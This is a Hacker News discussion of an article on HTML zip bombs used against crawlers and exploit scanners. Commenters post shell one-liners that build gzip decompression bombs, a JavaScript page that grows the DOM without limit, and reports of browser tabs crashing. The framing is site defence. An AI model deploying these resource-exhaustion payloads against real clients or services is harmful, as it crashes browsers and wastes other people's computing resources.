A valid HTML zip bomb

(ache.one)

137 points | by Bogdanp 1 day ago

14 comments

  • bhaney 1 day ago
    Neat approach. I make my anti-crawler HTML zip bombs like this:

        (echo '<html><head></head><body>' && yes "<div>") | dd bs=1M count=10240 iflag=fullblock | gzip > bomb.html.gz
    
    So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.
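
    For reference, a quick way to sanity-check the output without decompressing it (assuming the bomb.html.gz produced above):

        # compressed size on disk
        ls -lh bomb.html.gz
        # stored uncompressed size and ratio; note gzip records that size modulo 4 GiB,
        # so a multi-gigabyte bomb will under-report here
        gzip -l bomb.html.gz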
    • pyman 1 day ago
      This is a great idea.

      LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.

      We need more ideas like this!

      • bhaney 1 day ago
        This is the same idea as in the article, just an alternative flavor of generating the zip bomb.

        And I actually only serve this to exploit scanners, not LLM crawlers.

        I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:

        - The site's robots.txt didn't actually say what the author thought they had made it say

        - The crawler had nothing to do with the crawler it was claiming to be; it just hijacked a user agent to deflect blame

        It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.

    • _ache_ 1 day ago
      Nice command line.
    • chatmasta 1 day ago
      Note: the submission link is not the zip bomb. It’s safe to click.
      • abirch 1 day ago
        Sounds like something a person linking to a zip bomb would say :-D
      • andrew_eu 1 day ago
        I can imagine the large-scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb, they could simply discard the chunks that sit inside a comment. The same trick could be applied to other elements in the HTML though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs, that could also have an amplifying effect on a bad scraper.
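
        A rough sketch of the style-tag variant (sizes arbitrary, untested against any particular scraper):

            # same idea as the comment trick, but the filler lives in a <style> block
            (echo '<html><head><style>'
             yes ';' | head -c 10G
             echo '</style></head><body>hello</body></html>') | gzip > style-bomb.html.gz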
        • _ache_ 1 day ago
          There are definitely improvements that can be made. The comment part is more about aesthetics; it isn't actually needed. You could have just put the zip chunk in a `div`, I guess.
        • PeterStuer 1 day ago
          For every 1 robots.txt that is genuinely configured, there are 9 that make absolutely no sense at all.

          Worse. GETing the robots.txt automatically flags you as a 'bot'!

          So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that your hired cheapest junior webadmin copy/pasted there from some reddit comment, we now have to jump through hoops such as getting the robots.txt from a separate VPN, etc.

          • Grimblewald 1 day ago
            Well, robots.txt being an opaque, opt-out system was broken from the start. I've just started having hidden links and pages only mentioned in robots.txt, and any IP that tries those is immediately blocked for 24 hours. There is no reason to continue entertaining these companies.
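
            A minimal sketch of that kind of trap (the path, log location, and firewall command are just placeholders; a real setup would also expire the ban after 24 hours):

                # advertise a path in robots.txt that nothing legitimate ever links to
                printf 'User-agent: *\nDisallow: /honeypot-do-not-fetch/\n' >> /var/www/html/robots.txt
                # ...then ban any IP that requests it anyway
                grep 'GET /honeypot-do-not-fetch/' /var/log/nginx/access.log | awk '{print $1}' | sort -u |
                  while read -r ip; do iptables -A INPUT -s "$ip" -j DROP; done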
          • slig 1 day ago
            If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?
            • bhaney 1 day ago
              If you're doing this through cloudflare, you'll want to add the response header

                  cache-control: no-transform
              
              so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.

              That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.
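
              An easy way to see what actually reaches the client through Cloudflare (the URL is a placeholder):

                  # request gzip and inspect the response headers: encoding, length, cache status
                  curl -sI -H 'Accept-Encoding: gzip' https://example.com/bomb.html |
                    grep -iE 'content-encoding|content-length|cf-cache-status'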

              • uxjw 1 day ago
                Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/
                • cyanydeez 1 day ago
                  Do you think Meta AI's llama 4 failed so badly because they ended up crawling a bunch of labyrinths?
              • Alifatisk 16 hours ago
                I dislike that the website's sidebar all of a sudden collapses during scrolling; it shifts all the content to the left in the middle of reading.
                • fdomingues 16 hours ago
                  That content shift on page scroll is horrendous. Please don't do that; there is no need to auto-hide a sidebar.
                  • Telemakhos 1 day ago
                    Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.
                    • can16358p 1 day ago
                      Crashing Safari on iOS (not technically crashing the whole app, but the tab displays an internal WebKit error).
                      • cooprh 1 day ago
                        Crashed 1password on safari haha
                        • xd1936 1 day ago
                          Risky click
                          • ranger_danger 1 day ago
                            Did not crash Firefox nor Chrome for me on Linux.
                            • AndrewThrowaway 13 hours ago
                              Crashed Chrome tab on Windows instantly but Firefox is fine. It shows loading but pressing Ctrl + U even shows the very start of that fake HTML.
                              • _ache_ 1 day ago
                                Perhaps you have very generous limits on RAM allocation per thread. I have 32 GB (128 with swap) and it still crashes (silently on Firefox, and with a dedicated error screen on Chrome).
                                • Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04
                                  • _ache_ 1 day ago
                                    Usually in /etc/limits.conf. The field `as`, for address space, would be my guess, but I'm not sure; maybe `data`. The man page `man limits.conf` isn't very descriptive.
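
                                    For a quick experiment you can also set the same kind of limit per shell with ulimit before launching the browser (the value is just illustrative):

                                        # cap the virtual address space, in KiB, for everything started from this shell
                                        ulimit -v 4194304   # ~4 GiB
                                        firefox &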
                                    • inetknght 1 day ago
                                      > The man page `man limits.conf` isn't very descriptive.

                                      Looks to me like it's quite descriptive. What information do you think is missing?

                                      https://www.man7.org/linux/man-pages/man5/limits.conf.5.html

                                      • _ache_ 22 hours ago
                                        What is `data`? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical?

                                        What is maximum file size in the context of a process?! I mean, what happens if a file is bigger? Maybe it can't write a file bigger than that, or maybe it can't execute a file bigger than that.

                                        I have a bunch of questions.
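
                                        For what it's worth, those fields seem to map onto the kernel's per-process rlimits: `data` is RLIMIT_DATA, `as` is RLIMIT_AS (virtual address space), and the file-size one is RLIMIT_FSIZE, all described in `man 2 getrlimit`. They can be inspected directly, e.g.:

                                            # show the current soft/hard values for a process (here, the shell itself)
                                            prlimit --pid $$ --as --data --fsize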

                                • palmfacehn 1 day ago
                                  Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
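
                                      A minimal sketch of the scripted variant (wrapped in a shell heredoc only for convenience): the page stays tiny on the wire but grows without bound once the client runs it.

                                          cat > grow.html <<'HTML'
                                          <html><body><script>
                                            // keep appending nodes; memory use grows until the tab gives up
                                            for (;;) document.body.appendChild(document.createElement('div'));
                                          </script></body></html>
                                          HTML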
                                  • meinersbur 1 day ago
                                    It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to stop a parser from bailing out early.
                                    • palmfacehn 1 day ago
                                      For my usage, the compressed size difference with deeply nested divs was negligible.
                                  • esperent 1 day ago
                                    It crashed the tab in Brave on Android for me.
                                    • johnisgood 1 day ago
                                      It crashed the tab on Vivaldi (Linux).
                                    • Tepix 1 day ago
                                      Imagine you’re a crawler operator. Do you really have a problem with documents like this? I don’t think so.
                                      • Related:

                                        Fun with gzip bombs and email clients

                                        https://news.ycombinator.com/item?id=44651536